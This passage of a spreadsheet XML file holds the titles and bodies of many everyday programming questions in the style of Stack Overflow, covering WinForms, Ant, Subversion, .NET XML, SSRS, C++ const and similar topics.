    <t xml:space="preserve">&lt;p&gt;I've set the MaxDate and MinDate properties of a DateTimePicker. However, when I test the control at runtime, there is no way to tell the invalid dates from the valid ones. The only difference is that clicking on an invalid date does nothing.&lt;/p&gt;
&lt;p&gt;This is not very intuitive for the user. I want to be able to tell at a glance what the valid dates are.&lt;/p&gt;
&lt;p&gt;Is there any way to highlight the valid date range - or more appropriately, 'dim' the invalid dates? Or, is there another control which would be more appropriate? I'm sure a couple of combo boxes would work, but I really think the user should be presented with a calendar control when asked for a date.&lt;/p&gt;
&lt;p&gt;CONTEXT: This is a WinForms charting application. The range of valid data is fixed (new data is added via another process). The user needs to pick a date and time for the chart's start time (as well as a duration, which is handled separately).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ant and the available task - what if something is not available?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I use the  task, the property is only set to TRUE if the resource (say file) is available. If not, the property is undefined.&lt;/p&gt;
&lt;p&gt;When I print the value of the property, it gives true if the resource was available, but otherwise just prints the property name.&lt;/p&gt;
&lt;p&gt;Is there a way to set the property to some value if the resource is &lt;em&gt;not&lt;/em&gt; available? I have tried setting the property explicitly before the available check, but then ant complains:&lt;/p&gt;
&lt;pre&gt;
[available] DEPRECATED -  used to override an existing property.
[available]   Build file should not reuse the same property name for different values.
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Why shouldn't Helpers have html in them?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have heard that it's best not to actually have any html in your helpers; my question is, Why not?  And furthermore, if you were trying to generate an html list or something like that, how can I avoid actual tags?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;-fREW&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Running subversion under apache and mod_python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My Apache server runs on some non-default (not-root) account. When it tries to run a python script which in turn executes a subversion check-out command, 'svn checkout' fails with the following error message:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;svn: Can't open file '/root/.subversion/servers': Permission denied
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At the same time running that python script with subversion checkout command inside from command line under the same user account goes on perfectly well.&lt;/p&gt;
&lt;p&gt;Apache server 2.2.6 with mod_python 3.2.8 runs on Fedora Core 6 machine.&lt;/p&gt;
&lt;p&gt;Can anybody help me out? Thanks a lot.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reddit's commenting system (hierarchial)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For those of you who have looked at Reddit's source code, where exactly is the logic where it manages the comments hierarchial structure?&lt;/p&gt;
&lt;p&gt;I downloaded the code, but couldn't even find the database structure let alone where the reads and writes are for the commenting.&lt;/p&gt;
&lt;p&gt;Is it doing updates on lots of comments if someone replies to someone mid-way through a thread?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best/most popular ways to do aspect-oriented programming (AOP) in C#/.Net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the best/most popular ways to do aspect-oriented programming (AOP) in C#/.Net?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best practice to fork an open source project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to customize an open-source project. The changes are for a specific organization and will not be useful to the public project. The code changes include disabling features not needed by the organization (affecting 5% of the code), customizing other features for the organization (affecting 20% of the code), and adding new custom features (adding about 10% new code).&lt;/p&gt;
&lt;p&gt;I could start with the current version and customize from there. However, the original project continues to make advances and introduce new features, and I would like to be able to incorporate these improvements as they come along.&lt;/p&gt;
&lt;p&gt;What's the best way to manage this? Right now, I can only get release versions as they become available, but I should soon have read-only access to the original project's Subversion repository. I'm new to using Subversion repositories, but have them available to use for my code as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sharepoint: How to set the permission to edit WSS user profile</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running a SharePoint Application on a MOSS 2007 with a form based user authentication without using the MySite feature. So all the settings on the SSP administration site which only concern the user profile on the MySites should normally not affect the user profile of the application as these should be managed from WSS.&lt;/p&gt;
&lt;p&gt;But where could I define the settings for the WSS user profiles? At the moment a user can only edit the attributes in his profile which are listed as additional columns for the application's user list (WebsiteAction --&gt; WebisteSettings --&gt; Users and Groups --&gt; All users --&gt; ListSettings). So all other attributes like first, surname, info, title etc. are partly imported form our identity directory (LDAP) but are not editable for the users. &lt;/p&gt;
&lt;p&gt;So are there any options to define which of the attributes should be editable for the users and which one should not be? It would also be interesting if there are any options to define which LDAP attributes are mapped to the which WSS profile attribute.&lt;/p&gt;
&lt;p&gt;Bye,
Flo&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where to put controller parent class in CakePHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two controllers which share most of their code (but must be, nonetheless, different controllers). The obvious solution (to me, at least) is to create a class, and make the two controllers inherit from it. The thing is... where to put it? Now I have it in app_controller.php, but it's kind of messy there.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Source Control for multiple projects/solutions with shared libraries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently working on a project to convert a number of Excel VBA powered workbooks to VSTO solutions.  All of the workbooks will share a number of class libraries and third party assemblies, in fact most of the work is done in the class libraries.  I currently have my folder structure laid out like this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Base
    Libraries  
    Assemblies  
    Workbooks  
        Workbook1  
        Workbook2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Each of the workbooks will be its own solution, and the workbook solutions just reference the assemblies in the folder structure.  My question is how would you lay out the source control?  Would you start the repository at the base? Or would you create a repository for each workbook solution?  Would you rearrange the folders?    &lt;/p&gt;
&lt;p&gt;Now that we have the initial development done, we're about to have a bunch of outside developers come on to the project to helps us convert the rest of the workbooks and I really like the idea of them being able to check out from the base directory and having all of the dependencies ready to go.  I also worry that there are other concerns that come with having 20+ solutions/projects under one source control repository.  &lt;/p&gt;
&lt;p&gt;I want everything to be as simple as possible for people joining the project but I don't want to sacrifice long term usability.  In my mind I've been going back and forth, what's simpler one repository or one repository per solution?&lt;/p&gt;
&lt;p&gt;I'd appreciate and insight you have, because I'm fresh out.  &lt;/p&gt;
&lt;p&gt;Additional Information:  Currently, I am using Mercurial personally, but the project will probably get moved to StarTeam unless I can make some convincing arguments for something else.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Show weights in JgraphT</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have implemented this Graph: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ListenableDirectedWeightedGraph&amp;lt;String, MyWeightedEdge&amp;gt; g = 
    new ListenableDirectedWeightedGraph&amp;lt;String, MyWeightedEdge&amp;gt;(MyWeightedEdge.class); 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In order to show what the class name says; a simple listenable directed weighted graph. I want to change the label of the edges and instead of the format  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;return "(" + source + " : " + target + ")"; 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want it to show the weight of the edge. I realise that all actions on the nodes, e.g. the &lt;code&gt;getEdgesWeight()&lt;/code&gt; method, are delegated from the graph and not the edge. How can I show the weight of the edge? Do I have to pass in the Graph to the edge somehow? &lt;/p&gt;
&lt;p&gt;Any help is appreciated. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Integrate StackOverflow into IDEs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Okay, this is just a crazy idea I have. StackOverflow looks very structured and integrable into development applications. So would it be possible, even useful, to have a StackOverflow plugin for, say, Eclipse? &lt;/p&gt;
&lt;p&gt;Which features of StackOverflow would you like to have directly integrated into your IDE so you can use it "natively" without changing to a browser?&lt;/p&gt;
&lt;p&gt;EDIT: I'm thinking about ways of deeper integration than just using the web page inside the IDE. Like when you use a certain Java class and have a problem, answers from SO might flare up. There would probably be cases where something like this is annoying, but others may be very helpful.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Applescriptable mySQL client - low cost or free?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone recommend a MySQL front end client or OS X that is AppleScriptable?  Preferably low cost or free.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to search through archived files with Perl</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is your preferred method for reading through the contents of zipped directories with Perl ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DataGrid Edit Problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a DataGrid, with an ItemTemplate that has an image and label.  In the EditItemTemplate the label is replaced by a textbox.  My problem is that the edit template only shows when I click the Edit button the second time.  What gives?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a good alternative for SourceSafe on a USB Drive?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I like to keep my source files on a USB drive for the portability. To date I have been using Visual SourceSafe for this purpose. What is a good alternative to VSS that fulfils these criteria:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Entire database can be held on a USB "pen" drive&lt;/li&gt;
&lt;li&gt;Code / documentation duplicated on local drives&lt;/li&gt;
&lt;li&gt;Does not require a central server&lt;/li&gt;
&lt;li&gt;Easy to backup and restore using standard backup tools&lt;/li&gt;
&lt;li&gt;Integrates with Visual Studio&lt;/li&gt;
&lt;li&gt;Has a small footprint&lt;/li&gt;
&lt;li&gt;Easy to clean the database and keep small&lt;/li&gt;
&lt;li&gt;Compatible with Windows XP, Vista and Vista x64&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A good reference on setup would be good too.&lt;/p&gt;
&lt;h2&gt;UPDATE&lt;/h2&gt;
&lt;p&gt;I went with Subversion in the end (TortoiseSVN). It has been pretty robust so far so I would recommend it for people with the same problem.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to prevent blank xmlns attributes in output from .NET's XmlDocument?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When generating XML from XmlDocument in .NET, a blank &lt;code&gt;xmlns&lt;/code&gt; attribute appears the first time an element &lt;em&gt;without&lt;/em&gt; an associated namespace is inserted; how can this be prevented?&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XmlDocument xml = new XmlDocument();
xml.AppendChild(xml.CreateElement("root",
    "whatever:name-space-1.0"));
xml.DocumentElement.AppendChild(xml.CreateElement("loner"));
Console.WriteLine(xml.OuterXml);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;root xmlns="whatever:name-space-1.0"&amp;gt;&amp;lt;loner xmlns="" /&amp;gt;&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;Desired&lt;/em&gt; Output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;root xmlns="whatever:name-space-1.0"&amp;gt;&amp;lt;loner /&amp;gt;&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a solution applicable to the &lt;code&gt;XmlDocument&lt;/code&gt; code, not something that occurs &lt;em&gt;after&lt;/em&gt; converting the document to a string with &lt;code&gt;OuterXml&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;My reasoning for doing this is to see if I can match the standard XML of a particular protocol using XmlDocument-generated XML.  The blank &lt;code&gt;xmlns&lt;/code&gt; attribute &lt;em&gt;may&lt;/em&gt; not break or confuse a parser, but it's also not present in any usage that I've seen of this protocol.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I script a no-cost notification of batch file errors/returns?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem with stopping a service and starting it again and want to be notified when the process runs and let me know what the result is.  &lt;/p&gt;
&lt;p&gt;Here's the scenario,
I have a text file output of an "sc" command. I want to send that file but not as an attachment.  Also, I want to see the initial status quickly in the subject of the email.&lt;/p&gt;
&lt;p&gt;Here's the 'servstop.txt' file contents:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;[SC] StartService FAILED 1058:&lt;/p&gt;
  &lt;p&gt;The service cannot be started, either
  because it is disabled or because it
  has no enabled devices associated with
  it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I want the subject of the email to be "Alert Service Start: [SC] StartService FAILED 1058"
and the body to contain the entire error message above.&lt;/p&gt;
&lt;p&gt;I will put my current method in an answer below using a program called blat to send me the result.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Advantages to Using Private Static Methods</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When creating a class that has internal private methods, usually to reduce code duplication, that don't require the use of any instance fields, are there performance or memory advantages to declaring the method as static?&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foreach (XmlElement element in xmlDoc.DocumentElement.SelectNodes("sample"))
{
    string first = GetInnerXml(element, ".//first");
    string second = GetInnerXml(element, ".//second");
    string third = GetInnerXml(element, ".//third");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private static string GetInnerXml(XmlElement element, string nodeName)
{
    return GetInnerXml(element, nodeName, null);
}
private static string GetInnerXml(XmlElement element, string nodeName, string defaultValue)
{
    XmlNode node = element.SelectSingleNode(nodeName);
    return node == null ? defaultValue : node.InnerXml;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any advantage to declaring the GetInnerXml() methods as static?  No opinion responses please, I have an opinion.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Semantic merge tool</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Background: In my job, we use SVN, C# and VisualStudio. Part of my task regularly involves global renames. Often I end up with a broken build after renaming something and then merging in changes.&lt;/p&gt;
&lt;p&gt;The question: is there a solution out there that can look at my changes, notice the global rename and then apply that to the edit that others have made while merging them in?&lt;/p&gt;
&lt;p&gt;Another way to get much the same effect would be some sort of refactor log and then apply that to the incoming edits.&lt;/p&gt;
&lt;p&gt;The tool need not be perfect, even if it just noted any references in their edits that referred to something that I have edited would be valuable.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt; I'm aware of VS's refactor tools. What I'm looking for is something that will allow me to, after I have refactored my working copy, apply the same refactorings to other peoples edits that I now need to merge in.&lt;/p&gt;
&lt;p&gt;The ideal solution would be to make sure there are no outstanding edits when I do the refactoring, but that would prevent anyone else from getting anything done for the next week or more. (Because they would have to sync every half hour or so for the next week)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mathematica Downvalue Lhs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody know if there is a built-in function in Mathematica for getting the lhs of downvalue rules (without any holding)?  I know how to write the code to do it, but it seems basic enough for a built-in&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a[1]=2;
a[2]=3;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;BuiltInIDoNotKnowOf[a]&lt;/code&gt; returns &lt;code&gt;{1,2}&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Will my index be used if all columns are not used?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an index on columns A, B, C, D of table T&lt;/p&gt;
&lt;p&gt;I have a query that pulls from T with A, B, C in the WHERE clause.&lt;/p&gt;
&lt;p&gt;Will the index be used or will a separate index be needed that only includes A, B, C?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tips for budgeting QA hours</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Sometimes for QA it gets difficult to budget and track the QA hours as a person can spend enormous amount of time retesting the defects and performing regression if any. We can take ,as an example, a web application with 50 use cases. &lt;/p&gt;
&lt;p&gt;What are some tips for budgeting QA hours?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reproducing the blocked exe "unblock" option in file properties in windows 2003</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I download my program from my website to my windows 2003 machine, it has a block on it and you have to right click on the exe, then properties, then select the button "Unblock".&lt;/p&gt;
&lt;p&gt;I would like to add detection in my installer for when the file is blocked and hence doesn't have enough permissions.  &lt;/p&gt;
&lt;p&gt;But I can't eaisly reproduce getting my exe in this state where it needs to be unblocked.&lt;/p&gt;
&lt;p&gt;How can I get the unblock to appear on my exe so I can test this functionality?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Structure of projects in version control - .NET specific</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This post is similar to &lt;a href="http://stackoverflow.com/questions/16829/structure-of-projects-in-version-control"&gt;this previously asked question.&lt;/a&gt;  I really want to set up my SVN repository in TTB format, but when creating a project in Visual Studio 2008 (ASP.NET/VB.NET), the structure created tends to be incompatible when considering the solution file, project files, folders for projects, multiple projects within solutions, etc.  Does anyone have a script or procedure to take a newly created ASP.NET project and move it to a TTB format as painlessly as possible?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Let me be more specific.  Suppose I have a project that I'm creating called StackOverflowIsAwesome.  I can put that into my local folder structure (let's say that it's c:\working).  When I create it, VS creates c:\working\StackOverflowIsAwesome and a whole bunch of subfolders (bin, app_data, etc.).  But I want my repository structure to look like...&lt;/p&gt;
&lt;pre&gt;
StackOverflowIsAwesome
    /trunk
        /bin
        /app_data
    /tags
    /branches
&lt;/pre&gt;
&lt;p&gt;So, is there a clean way to do this consistently or do I need to resort to constantly moving/modifying files and folders to make this work?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the different types of indexes, what are the benefits of each?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the different types of indexes, what are the benefits of each?&lt;/p&gt;
&lt;p&gt;I heard of covering and clustered indexes, are there more? Where would you use them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Prevent visual studio creating browse info (.ncb) files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to prevent VS2008 creating browse info file files for C++ projects.&lt;br /&gt;
I rarely use the class browser and it isn't worth the time it takes to recreate it after every build, especially since it runs even if the build failed.&lt;/p&gt;
&lt;p&gt;EDIT - it's also needed for go to declaration/definition&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best approach to centralzing error messages in an application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;All throughout an application wherever error messages (or other user messages) are used I typically hard-code a string. Obviosly this can be really bad (especially when you may have to come back and localize an app). What is the best approach to centralize these strings? A static class? Constants? An XML File? Or a combination (like creating a static class with constants that are used to read from an xml file).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to configure Tomcat JULI logging to roll log files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a several webapps which use java.util.logging.  Tomcat 5.5 is configured to use the Juli logger so that each webapp has its own log file.  The problem is that Juli does not have properties for maximum file size and file count.  Using Juli the files will grow unbounded and only roll at the end of the day.  Also, an unlimited number of log files are retained.&lt;/p&gt;
&lt;p&gt;You can see the FileHandler properties on this page - &lt;a href="http://tomcat.apache.org/tomcat-5.5-doc/logging.html"&gt;Apache Tomcat 5.5 Documentation&lt;/a&gt;&lt;br /&gt;
There is no limit or count property (the following lines do nothing)&lt;br /&gt;
&lt;code&gt;org.apache.juli.FileHandler.limit=102400&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;org.apache.juli.FileHandler.count=5&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Without changing the webapps is there a way to get unique log files for each application with some type of bounds on the log file sizes?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;
The solution I found was not use the Juli logger at all!
&lt;code&gt;java.util.logging.FileHandler.limit=102400&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;java.util.logging.FileHandler.count=5&lt;/code&gt;  &lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Greg&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does XSLT have a Split() function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a string in a node and I'd like to split the string on '?' and return the last item in the array.&lt;/p&gt;
&lt;p&gt;For example, in the block below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a&amp;gt;
    &amp;lt;xsl:attribute name="href"&amp;gt;
        /newpage.aspx?&amp;lt;xsl:value-of select="someNode"/&amp;gt;
    &amp;lt;/xsl:attribute&amp;gt;
    Link text
&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like to split the &lt;code&gt;someNode&lt;/code&gt; value.&lt;/p&gt;
&lt;p&gt;Edit: 
Here's the VB.Net that I use to load the Xsl for my Asp.Net page:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim xslDocPath As String = HttpContext.Current.Server.MapPath("~/App_Data/someXslt.xsl")
Dim myXsltSettings As New XsltSettings()
Dim myXMLResolver As New XmlUrlResolver()
myXsltSettings.EnableScript = True
myXsltSettings.EnableDocumentFunction = True
myXslDoc = New XslCompiledTransform(False)
myXslDoc.Load(xslDocPath, myXsltSettings, myXMLResolver)
Dim myStringBuilder As New StringBuilder()
Dim myXmlWriter As XmlWriter = Nothing
Dim myXmlWriterSettings As New XmlWriterSettings()
myXmlWriterSettings.ConformanceLevel = ConformanceLevel.Auto
myXmlWriterSettings.Indent = True
myXmlWriterSettings.OmitXmlDeclaration = True
myXmlWriter = XmlWriter.Create(myStringBuilder, myXmlWriterSettings)
myXslDoc.Transform(xmlDoc, argumentList, myXmlWriter)
Return myStringBuilder.ToString()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; here's &lt;a href="http://gist.github.com/360186"&gt;an example of splitting XML on a particular node&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to have a Label inherite a Composite's GC in SWT</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing an app and our designers want to use gradients for some of the backgrounds on a few of our composites. &lt;/p&gt;
&lt;p&gt;I wrote the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;composite.addListener (SWT.Paint, new Listener () {
    public void handleEvent (Event e) {
            GC gc = e.gc;
            Rectangle rect = composite.getClientArea ();
            Color color1 = new Color (display, 0, 0, 0);
            Color color2 = new Color (display, 255, 255, 255);
            gc.setForeground(color1);
            gc.setBackground(color2);
            gc.fillGradientRectangle (rect.x, rect.y, rect.width, rect.height , true);
        }
    });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This draws the gradient fine on the composite, but we have Label/CLabels, Canvases and Links on top of the composite. &lt;/p&gt;
&lt;p&gt;In these areas, the background is just the plain gray you get when drawing an empty canvas. &lt;/p&gt;
&lt;p&gt;I've tried forcing the Labels to inherit the background like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;label.setBackgroundMode(SWT.INHERIT_DEFAULT) //SWT.INHERIT_FORCE Doesn't work either
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this leaves me with the same default gray and no gradient behind the components on top of the Composite. &lt;/p&gt;
&lt;p&gt;Any suggestions for getting the gradient to be the background of each element?&lt;/p&gt;
&lt;p&gt;I wouldn't be opposed to drawing the Gradient onto a gc with an image supplied and then setting the background to that Image. However that method just hasn't been working at all, composite or any of its elements. &lt;/p&gt;
&lt;p&gt;Also it's not possible for me to set the gradient individually to my knowledge. We want the whole composite to be one uniform flowing gradient. &lt;/p&gt;
&lt;p&gt;[edit] I uploaded an example upto twitpic &lt;a href="http://twitpic.com/d5qz" rel="nofollow"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Brian Gianforcaro&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Long compile times and lost productivity</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How long can a compile time get before it starts becoming a &lt;a href="http://xkcd.com/303/"&gt;distraction&lt;/a&gt; to you?&lt;/p&gt;
&lt;p&gt;For me:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&amp;lt;1 sec, I don't notice&lt;/li&gt;
&lt;li&gt;&gt;1 min, I'm going for coffee&lt;/li&gt;
&lt;li&gt;&gt;10 min, S.O. here I come&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;(any other programming task that involves letting the computer do it's thing also apropos)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check for null values before doing .AddDays() in SSRS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following as the value for my textbox in SSRS report:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   =iif(IsNothing(Fields!MyDate.Value), "", Format(Fields!MyDate.Value.AddDays(30), "MMMM dd, yyyy"))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It gives me an "#Error" every time MyDate is null.&lt;/p&gt;
&lt;p&gt;How do i work around this?&lt;/p&gt;
&lt;p&gt;UPDATE:&lt;/p&gt;
&lt;p&gt;i wrote this custom function, it got rid of the error, but returns January 31, 0001 when null date is passed.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Public Shared Function NewDate(myDate as DateTime, days as integer) AS string
IF ISNOTHING(myDate) OR ISDBNULL(myDate) Then
    NewDate = "        "
ELSE
    NewDate = Format(myDate.AddDays(days), "MMMM dd, yyyy")
END IF
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;@&lt;a href="#136854" rel="nofollow"&gt;Matt Hamilton&lt;/a&gt;: DateAdd("d", 30,Fields!MyDate.Value)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sell me on const correctness</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So why exactly is it that it's always recommended to use const as often as possible?  It seems to me that using const can be more of a pain than a help in C++.  But then again, I'm coming at this from the python perspective:  if you don't want something to be changed, don't change it.  So with that said, here are a few questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;It seems like every time I mark something as const, I get an error and have to change some other function somewhere to be const too.  Then this causes me to have to change &lt;em&gt;another&lt;/em&gt; function somewhere else.  Is this something that just gets easier with experience?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Are the benefits of using const &lt;em&gt;really&lt;/em&gt; enough to compensate for the trouble?  If you don't intend on changing an object, why not just not write code that doesn't change it?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I should note that at this point in time, I'm most focused on the benefits of using const for correctness and maintainability purposes, although it is also nice to have an idea of the performance implications.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;:  I'm told that the correct term is const correctness, so that's what the title is now.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>GUI Design: How do you do it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you draw your windows before constructing them?  What do you use?&lt;/p&gt;
&lt;p&gt;I've tried the Pencil plugin for FF.  I've tried MS Visio.  I've tried paper &amp;amp; pencil.  I've tried Designer Vista.  etc.  etc.  etc.&lt;/p&gt;
&lt;p&gt;I'm currently leaning toward paper &amp;amp; pencil, but what about you; what's your preference?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to read and parse a large text file over the network?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem which requires me to parse several log files from a remote machine.
There are a few complications:
1) The file may be in use
2) The files can be quite large (100mb+)
3) Each entry may be multi-line&lt;/p&gt;
&lt;p&gt;To solve the in-use issue, I need to copy it first. I'm currently copying it directly from the remote machine to the local machine, and parsing it there. That leads to issue 2. Since the files are quite large copying it locally can take quite a while.&lt;/p&gt;
&lt;p&gt;To enhance parsing time, I'd like to make the parser multi-threaded, but that makes dealing with multi-lined entries a bit trickier. &lt;/p&gt;
&lt;p&gt;The two main issues are:
1) How do i speed up the file transfer (Compression?, Is transferring locally even neccessary?, Can I read an in use file some other way?)
2) How do i deal with multi-line entries when splitting up the lines among threads?&lt;/p&gt;
&lt;p&gt;UPDATE: The reason I didnt do the obvious parse on the server reason is that I want to have as little cpu impact as possible. I don't want to affect the performance of the system im testing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Too many "pattern suffixes" - design smell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just found myself creating a class called "InstructionBuilderFactoryMapFactory".  That's 4 "pattern suffixes" on one class.  It immediately reminded me of this:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.jroller.com/landers/entry/the_design_pattern_facade_pattern" rel="nofollow"&gt;http://www.jroller.com/landers/entry/the_design_pattern_facade_pattern&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Is this a design smell? Should I impose a limit on this number?  &lt;/p&gt;
&lt;p&gt;I know some programmers have similar rules for other things (e.g. no more than N levels of pointer indirection in C.)&lt;/p&gt;
&lt;p&gt;All the classes seem necessary to me.  I have a (fixed) map from strings to factories - something I do all the time.  The list is getting long and I want to move it out of the constructor of the class that uses the builders (that are created by the factories that are obtained from the map...)  And as usual I'm avoiding Singletons.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the difference between the open source licences</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I read all the licenses, and frankly I am kindda baffled by the many choices available. I know some relax the limitation of the license so that open source stuff can be used in commercial applications.&lt;br&gt;
